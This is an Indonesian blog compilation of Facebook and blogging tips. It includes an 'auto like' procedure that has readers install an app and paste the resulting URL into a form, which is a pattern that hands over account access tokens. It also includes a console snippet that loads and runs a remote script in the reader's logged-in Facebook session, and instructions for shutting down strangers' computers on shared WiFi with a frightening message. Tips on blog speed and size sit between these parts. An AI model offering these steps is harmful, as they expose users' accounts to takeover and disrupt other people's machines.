Cara Agar Status Facebook Banyak Like




Bagi para facebooker yang malu karena statusnya sepi like, tapi jangan khawatir saya punya cara jitu agar statusmu banyak like, langsung aja ke TKP

Cara Menggunakan : 
1.Untuk bisa menggunakan Auto like , Usahakan Usia Akun Facebook anda minimal 18 tahun.
2.Pastikan Dulu pengaturan pada Akun Facebook anda sudah benar.Lihat pada [Setting] Centang pada
    kolom "Allow Subscribers"





3.Pastikan setting privasi anda adalah "Public"






4.Klik Dulu Tulisan "Click Here" Jangan klik tombol "Submit" Dulu.






5.Nanti anda akan di alihkan pada halaman "Xperia SmartPhone from Sony"Lalu Klik Install




6.Setelah itu anda akan di arahkan pada halaman kosong , nanti akan ada tulisan "Success"



7.Copy URL pada halaman tersebut.







8.Pastekan pada kotak yang tersedia , lalu tekan "Submit"





Autolike 2


Semoga Bermanfaat


Cara Agar Grup Facebook Banyak Angggota



SCRIPT AUTO INVITE GRUP FACEBOOK. BAGI PARA FACEBOOKER YANG INGIN PUNYA GRUP DENGAN RIBUAN ANGGOTA ??



NIH PAKAI CARA INI, LANGSUNG AJA !!



1. BUKA BROWSER MOZILLA


2. LALU LOGIN FACEBOOK SOBAT

3. MASUK KE GRUP YANG SUDAH SOBAT BUAT

4. LALU TEKAN  CTRL + SHIFT + K PADA KEYBOARD SOBAT

5. LALU COPY DAN PASTE CODE DIBAWAH INI :


javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://grup-facebook-gue.googlecode.com/files/new-auto-invit.js';})();


6. LALU TEKAN ENTER ....

7. TUNGGU PROSES SELESAI....

GIMANA???  BISA GAK???  KOMENTAR YAHH....


Cara Mempercepat Loading Blog


Pada kesempatan kali ini saya akan menjelaskan tentang tips cara bagaimana mempercepat loading blogspot. 

Blog dengan banyak gambar, link, widget dan teks akan membuat lambat pada saat tampil pada halaman blog tersebut. Ini akan mempengaruhi pengunjung untuk segera pergi dari halaman blog agan karena bener bener LEMOT,  
  • Mengapa kecepatan penting?
Banyak pengunjung datang ke blog/website melalui link atau melalui pencarian Google. Hanya dalam beberapa detik ini  pengunjung akan memutuskan apakah situs Anda menarik atau tidak. 
  • Mengukur kecepatan situs Anda
Mengukur kecepatan Coba selfseo.com Atau linkvendor.com untuk analisis lebih mendalam, gunakan websiteoptimization.com. Setiap kali mengubah sesuatu di situs Anda, mengukur perbedaan apa perubahan terjadi. untuk mencari tahu apa bagian-bagian tertentu (widget, gambar, skrip, ..) yang memperlambat situ. 
  • Kompres gambar.
Kebanyakan orang berpikir karena mereka menggunakan gambar-gambar kecil  secara otomatis mengambil sedikit waktu untuk menampilkan halaman blog. Tidak sepenuhnya begitu. Hal ini tergantung pada ukuran data (Kbytes) dari gambar. Periksa gambar Anda dengan mengklik kanan dan pilih 'Properties'. Tipikal 400 x 300 pixel gambar tidak boleh lebih dari 20-40 kbyte. Seringkali orang menggunakant gambar 100 kbyte. 
  • Membatasi widget
Gunakan widget yang diperlukan karena itu juga bisa memperlambat halaman anda untuk tampil, benar dengan widget tampilan blog akan lebih menarik, tapi seseorang hanya membutuhkan waktu 3-5 detik untuk menunggu halaman blog kita tampil sebaiknya membatasi widget.

Cara Mengukur Berat Blog


Berat- Tips Blogger kali ini adalah Mengukur Berat Blog. Seperti yang anda tahu blog juga mempunyai berat, tetapi blog tidak ada gaya gravitasi, melainkan blog memakai ukuran. Biasanya blog yang berat paling tidak disukai oleh orang, ada yang mengatakan loadingnya lama, dan ada yang mengatakan gambarnya kebanyakan. Hal itu harus segera di hindari, karena SEO juga menganggap hal itu sebagai masalah, jadi intinya blog yang berat tidak mudah di indeks oleh Google, karena google kesusahan untuk mencapai halaman tersebut, kalau anda memakai sitemap jenis atom tidak apa-apa blog beratnya sejuta ton juga tidak apa-apa, tetapi kalau anda memakai sitemap jenis peta situs dari google usahakan jangan, anda harus mengurangi berat blog, karena sitemap.xml adalah salah satu instruksi untuk dirayapi oleh robot google. Jika anda ingin mengukur berat atau ukuran blog anda, anda harus mengikuti artikel ini terusssssss sampai bawah.



Pengukur berat blog, online:








Iwebtool ini adalah aplikasi online yang bertugas untuk mengukur setiap domain, pengukurannya hampir tepat, dan hampir ringkas, anda sangat cocok untuk menggunakan aplikasi online ini.

Cara Mematikan Komputer Lain Dari Jarak Jauh


Hai pengguna komputer, sudah lama saya tidak mengetik selama minggu ini, saya sedang mencari ide. Selama berminggu-minggu saya menjelajah internet. Saya menemukan sebuah cara untuk mematikan komputer dari jarak jauh. Cara ini hanya bisa digunakan pada satu jaringan (mis: WiFi, warnet, dll). Caranya sangat mudah, bahkan hanya menggunakan cmd yang sudah terinstall di komputer anda. Cara ini digunakan apabila anda menggunakan WiFi dan kesal terhadap komputer lain yang membuat lambat komputer anda. Free Hotspot adalah tempat teramai yang digunakan untuk berinternet, biasanya free hotspot ini diselenggarakan oleh PT.Telekomunikasi Indonesia (PT.Telkom). PT. Telkom sudah berjasa menghubungkan telepon, internet, dll. Speedy adalah komunikasi internet tercepat yang digunakan oleh telkom.




Setelah anda sudah mengerti penjelasan di atas, sekarang kita akan mengganti tema menjadi cara yang ditunggu-tunggu.

Ikuti langkah-langkah berikut ini:

1. Buka Command Prompt.




cara mematikan komputer lain dari jarak jauh

2. Ketikan kode di bawah ini pada command prompt:


shutdown -i

3. Lalu akan muncul jendela seperti di bawah ini:


menghack komputer
  • Isi kolom Computers, dengan meng-klik "Add" atau "browse", lalu isikan nama komputer atau Ip address.
  • Pilih waktu komputer akan dimatikan.
  • Isi kolom "Comment" dengan kata-kata seperti Komputer anda akan rusak 30 detik lagi.
  • Klik OK